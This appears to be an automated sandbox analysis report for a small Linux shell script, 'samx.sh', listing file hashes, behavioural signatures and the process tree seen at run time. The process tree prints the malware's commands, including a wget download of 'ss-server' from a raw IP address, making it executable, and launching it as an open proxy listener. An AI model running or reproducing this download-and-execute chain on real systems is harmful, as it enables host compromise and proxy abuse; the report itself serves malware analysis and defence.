Analysis

  • max time kernel
    0s
  • max time network
    135s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    23-11-2022 15:40

General

  • Target

    samx.sh

  • Size

    400B

  • MD5

    6039cf7d6cc1378682e1a983fcaba7a8

  • SHA1

    3ca4e29546ca125fd98429768ae0fd44182ccdee

  • SHA256

    af2bc5dda7b0ae47a3ccd286afa17718b4e81daf944a8784e445e597dbbdcd28

  • SHA512

    4119e1787b6edcc2639f0266308aea50891e67ea23404a060dd46bea082bc26033d8aafb93c06c084c391e141f838eacf21433cf94aabf1bf1e7b8e393504253

Score
8/10

Malware Config

Signatures

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/samx.sh
    /tmp/samx.sh
    1⤵
    • Writes file to tmp directory
    PID:581
    • /bin/sleep
      sleep 120
      2⤵
        PID:582
      • /bin/mount
        mount -no "remount,rw" /
        2⤵
        • Reads runtime system information
        PID:587
      • /bin/ping
        ping -c 4 samx-.subdomain.llzxs.com
        2⤵
        • Modifies hosts file
        • Writes DNS configuration
        PID:595
      • /usr/bin/wget
        wget -P /tmp/ http://185.135.73.148:800/ss-server
        2⤵
        • Writes file to tmp directory
        PID:596
      • /bin/sleep
        sleep 10
        2⤵
          PID:597
        • /bin/chmod
          chmod +x /tmp/ss-server
          2⤵
            PID:598
        • /bin/sed
          sed "s/ /-/g"
          1⤵
          • Reads runtime system information
          PID:590
        • /bin/grep
          grep "inet addr"
          1⤵
            PID:593
          • /bin/sed
            sed -r "s/ +inet addr:([0-9.]+) .+/\\1/g"
            1⤵
            • Reads runtime system information
            PID:594
          • /tmp/ss-server
            /tmp/ss-server -s 0.0.0.0 -p 8300 -m aes-256-cfb -k 123456
            1⤵
            • Writes file to tmp directory
            PID:600

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads